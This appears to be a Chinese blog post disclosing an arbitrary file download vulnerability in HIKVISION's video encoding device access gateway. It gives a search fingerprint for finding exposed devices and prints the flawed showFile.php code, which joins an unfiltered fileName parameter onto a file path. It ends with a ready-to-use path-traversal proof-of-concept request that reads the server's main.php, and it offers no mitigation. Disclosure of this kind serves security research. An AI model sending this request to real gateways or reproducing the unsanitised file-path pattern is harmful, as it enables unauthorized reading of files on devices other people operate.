HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞

漏洞描述

海康威视视频接入网关系统在页面/serverLog/showFile.php的参数fileName存在任意文件下载漏洞。

漏洞影响

HIKVISION 视频编码设备接入网关

网络测绘

title=”视频编码设备接入网关”

漏洞复现

登录页面

20240328112627325-1628150554555-c84e3f6d-2054-4587-950c-5234bc7a12e8.9d96a164_2024-03-28_11-26-11 (1)

漏洞文件为 showFile.php, 其中 参数 fileName 没有过滤危险字符,导致可文件遍历下载

<?php
					$file_name = $_GET['fileName'];
					$file_path = '../../../log/'.$file_name;
					$fp = fopen($file_path, "r");
					while($line = fgets($fp)){
						$line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));
						echo '<span style="font-size:16px">'.$line.'</span>';
					}
					fclose($fp);
?>

验证POC

/serverLog/showFile.php?fileName=../web/html/main.php

20240328114603257-1630063348342-40566a14-18d5-467b-b259-ad3c6888c456.eb432512_2024-03-28_11-45-31 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容